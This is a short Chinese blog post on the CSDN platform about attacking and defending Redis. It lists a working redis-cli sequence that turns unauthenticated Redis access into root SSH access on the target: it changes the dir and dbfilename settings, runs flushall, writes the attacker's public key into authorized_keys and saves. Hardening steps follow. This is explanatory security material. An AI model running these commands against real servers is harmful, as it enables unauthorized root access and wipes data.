redis攻与防

最新推荐文章于 2022-06-25 20:16:02 发布
最新推荐文章于 2022-06-25 20:16:02 发布
阅读量135 收藏
点赞数
分类专栏: Redis 文章标签: 数据库 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rentuo53/article/details/84916288
版权

redis攻与防

 

思路:

将入侵者(centos201)的公钥写入到被入侵者(centos200,没有安全措施redis服务器)上,从而达到直联centos200的目的。 

 

1、生成本机公钥(centos201)

ssh-keygen -t rsa

 

2、在本机执行命令完成入侵

redis-cli -h centos200 -p 6379 config set dir /root/.ssh

redis-cli -h centos200 -p 6379 config set dbfilename "authorized_keys"

redis-cli -h centos200 -p 6379 flushall

(echo -e '\n';cat /root/.ssh/id_rsa.pub;echo -e '\n') | redis-cli -h centos200 -p 6379  -x set crackit

redis-cli -h centos200 -p 6379 save

 

3、本机测试

ssh centos200

 

安全防护:

1、bind参数设置:绑定访问ip,不能任意IP(0.0.0.0)都可访问

2、更改默认的6379端口

3、设置复杂度较高的密码

4、禁用相关重要命令:flushall\config\eval,举例:rename-command FLUSHALL ""

5、禁止使用root启动redis,使用一些不能登录(nologin)的账号启动服务

groupadd -r redis && useradd -r -g redis redis

6、保证 authorized_keys 文件的安全

为了保证安全,您应该阻止其他用户添加新的公钥。

将 authorized_keys 的权限设置为对拥有者只读,其他用户没有任何权限:

$ chmod 400 ~/.ssh/authorized_keys

为保证 authorized_keys 的权限不会被改掉,您还需要设置该文件的 immutable 位权限:

# chattr +i ~/.ssh/authorized_keys

然用户还可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况,需要设置 ~./ssh 的 immutable 位权限:

# chattr +i ~/.ssh

注意: 如果需要添加新的公钥,需要移除 authorized_keys 的 immutable 位权限。然后,添加好新的公钥之后,按照上述步骤重新加上 immutable 位权限。

rentuo53
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis 登录_Redis匿名访问漏洞
weixin_39689819的博客
11-26 630
简介Redis匿名访问漏洞也被称为Redis未授权访问漏洞。是由于Redis服务本身的特性及其运维不当造成的Redis数据库介绍Redis是一个数据库系统,其项目也在github上开源。Redis是一个高性能的key-value的NOSQL数据库系统,Redis使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型的数据库系统。Redis的储存方式Redis的数...
使用root用户添加redis用户(redis集群的准备工作)
GavenFang
04-04 7101
redis用户uid,gid均为:246;/redis目录的属组为:redis:redis 1.查看所有用户 cat /etc/passwd 2.添加 redis 用户(用户名、密码均为 redisuseradd redis passwd redis 3.修改 redis 用户权限 usermod -u 246 redis 4.创建 /redis 目录 mkdir -p /redis 5.给 ...
docker安装redis5,并通过redis可视化工具连接容器安装的redis
qq_40750454的博客
03-25 666
1.创建一个Dockerfile文件,文件内容如下:(注:expose为开放6379端口) FROM centos:centos7 RUN groupadd -r redis && useradd -r -g redis redis RUN yum update -y ; \ yum -y install gcc automake autoconf libtool make wget epel-release gcc-c++; RUN mkdir -p /usr/src/red
Redis 未授权访问漏洞利用及修复
Thunderclap的博客
06-25 3912
Redis 未授权访问漏洞利用及修复
Docker系列(二十四)——Docker实例六Docker安装Redis实例
Spring Boot-Common On With You
04-08 608
《Docker实例三Docker安装Redis实例 》 前言 在前面一篇文章种,完成了 《Docker安装MongoDB实例 》,本篇将继续镜像安装教程,并完成Docker安装Redis实例。 Docker实例三Docker安装Redis实例 第一种:使用docker pull 镜像名拉取镜像 ...
redis未授权访问
热门推荐
guxiaoguo的博客
12-27 1万+
本篇主要从redis未授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 应用介绍 漏洞介绍 测试环境 说明攻击方法 redis日志 修复方案 作者:悦潺@安全之光 一. 应用介绍   Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数
Redis安装与卸载文档
08-21
Redis安装与卸载文档 在本文档中,我们将详细介绍 Redis 的安装和卸载过程。Redis 是一个开源的、使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。 安装...
Redis设计与实现_redis设计与实现_
10-01
redis设计与实现 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,...
Redis实践与实战集锦
03-01
Redis实践与实战集锦】是一系列关于Redis学习和应用的文章集合,涵盖了Redis的基础概念、使用场景、安装运维,以及如何在Java和Python中进行编程访问。以下是对这些知识点的详细解析: 1. **Redis基础知识**:...
Redis 设计与实现.mobi
12-13
Redis 设计与实现.mobi
使用docker搭建redis主从
迟迟 CSDN
03-12 5171
一、构建 Docker 环境 1、创建 dockerfile FROM centos:latest RUN groupadd -r redis && useradd -r -g redis redis RUN yum -y update && yum -y install epel-release && yum -y install re...
Redis未授权访问漏洞复现(包括环境搭建)
smart的博客
10-19 5043
Redis未授权访问漏洞复现(包括环境搭建)Redis环境搭建一、工具二、redis安装步骤拿shell的三种姿势一、通过向Web目录中写webshell二、利用计划任务执行命令反弹shel三、写入ssh公钥,获取操作系统权限redis未授权漏洞防御手段 Redis环境搭建 一、工具 工具名称 版本 redis 3.2.9 centos 6.9 Redis官网复制redis的下载连接:http://download.redis.io/releases/redis-3.2.9.tar.
Redis未授权访问漏洞修复
weixin_33711647的博客
10-17 322
1.禁止一些高危命令(重启redis才能生效) 修改 redis.conf 文件,禁用远程修改 DB 文件地址 rename-command FLUSHALL"" rename-command CONFIG"" rename-command EVAL"" 或者通过修改redis.conf文件,改变这些高危命令的名称 rena...
redis 普通用户,非root用户安装redis
panjinxiang4217的专栏
07-01 3008
1、下载地址 redis下载地址: 可以在如下的地址下载到你想要的所有版本,我们这里使用的是5.0.12 https://download.redis.io/releases/ 2、新建redis普通用户 1)、使用root登录我们的系统 2)、新建组:groupadd redis 3)、新建用户:useradd redis-g redis 4)、设置密码:passwd redis 自己输入密码即可 groupadd redis useradd redis -g red..
docker部署redis集群_Docker部署Redis集群----第三节(docker-redis集群主从复制【上】实现篇)...
weixin_39685578的博客
11-20 70
上一节课介绍了docker中指令的概念和使用方法,本节课我们将正式开始用docker来搭建redis的集群,在本 机课中有些理论知识都会讲解,希望大家能吸收,相信对一个技术的运用永远不要只建立在“会“,要理解怎么回 事才是关键。因为多问自己一个为什么才能更好地提升自己。1、redis的集群方式有哪些?主从复制哨兵集群redis-cluster集群本节课我们主要讲解主从复制,现在大家手上是否有一台属...
3.docker网络及主从构建
qq_28613081的博客
05-05 252
1. lnrp环境构建 1.1. 构建镜像 nginx的dockerfile FROM centos:centos7 RUN mkdir /data && mkdir /conf RUN groupadd -r nginx && useradd -r -g nginx nginx #修改时区 RUN cp /usr/share/zoneinf...
Redis未授权访问漏洞的利用及防护
weixin_34148340的博客
08-30 405
Redis未授权访问漏洞的利用及防护 什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略,比如添加防火墙规则、避免其他非信任来源IP访问等,这样会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在访问目标服务器时,可以在未授权的情况下访问Redis以及读取Redis的数据。攻击者在未授权...
redis的两种安装方式
weixin_45934327的博客
08-04 412
一、使用yum在线安装redis 1、下载安装镜像源 http://mirrors.aliyun.com [root@localhost ~]# wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo [root@localhost ~]# yum install redis 2、启动服务,查看服务状态 [root@localhost ~]# systemctl start redis [r...
redis安装实战.pptx
最新发布
10-21
2. `redis-cli`:命令行客户端,用于与Redis服务器交互,执行读写操作以及配置查看等。 3. `redis-benchmark`:性能基准测试工具,可用于评估Redis的读写速度和并发性能。 4. `redis-check-aof`:检查AOF文件的完整...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值